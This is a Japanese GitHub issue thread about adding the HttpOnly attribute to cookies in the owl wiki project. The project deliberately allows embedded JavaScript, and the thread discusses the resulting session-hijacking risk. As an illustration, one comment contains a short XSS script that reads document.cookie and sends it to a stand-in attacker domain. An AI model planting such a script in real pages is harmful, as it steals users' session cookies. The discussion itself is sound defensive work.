### ISSUE TITLE
CookieにHttpOnly属性を付ける

### ISSUE THREAD

**Issue by YuyaAbo** [owl/owl#130]
デス！

https://gyazo.com/37a81333f5befd5959c3742a125c128d

**Comment by fortkle** [comment]
@YuyaAbo 
（javascriptを実行したいニーズがあるので今のところあえてエスケープしておりません...）
（本当は悪意のあるjavascriptのみ禁止にしたいのですが、その工数が取れてない感じです...）

**Comment by fortkle** [comment]
javascript、というかタグ埋め込みを許可すると、色んなタグ埋め込みのサードパーティを記事中に埋め込めるのです...
ex.) Googleマップ、Googleドキュメント、Twitter, Youtubeなど

**Comment by fortkle** [comment]
できればこういうの使いたいよねぇ
https://codemirror.net/

**Comment by YuyaAbo** [comment]
そういう背景があったんですネ（そういえば新卒島田氏のページが真っ黒に染められていた。。。）

**Comment by sota1235** [comment]
一応できること絞るために`httpOnly`ヘッダだけでもつけておくといいかもしれませんね。
セッションハイジャックはよろしくないので…

**Comment by fortkle** [comment]
@sota1235 そのあたりよく分かっていないのだけど、 http://qiita.com/sota1235/items/70c5c45c3e7e084e39c4 をすれば少しはよくなるということかい？？

**Comment by fortkle** [comment]
issue名、放置感が出て誤解を生みそうなので変更

**Comment by sota1235** [comment]
そうです！
httpOnlyつけておくと対応ブラウザであればJSからクッキーにアクセスできない(`document.cookie`を参照できない)ようになるので、例えば記事に下記のような攻撃スクリプトを仕込んでもクッキーは盗めなくなるって感じです。

```javascript
var cookie = document.cookie;
var elm = document.createElement('img');
elm.setAttribute('src', 'http://kogekisha.site?cookie=' + cookie); // 攻撃者のサイトのアクセスログにユーザのクッキーが残る
```

**Comment by sota1235** [comment]
https://www.softel.co.jp/blogs/tech/archives/3275
これがわかりやすいですね～

**Comment by fortkle** [comment]
@sota1235 知ってたら教えてほしいんだけどこれがデフォルトfalseなのって何か理由あるんです？後方互換性？？

**Comment by sota1235** [comment]
放置してた…
調べてみたらデフォルトで有効っぽいので大丈夫でした。。。
closeします。(`config/session.php`のはhttps通信でのcookieの設定みたいです)

![](https://i.gyazo.com/de7bd16cdc10a0d61f65bc9daddfcc93.png)

**Comment by fortkle** [comment]
@sota1235 
👍
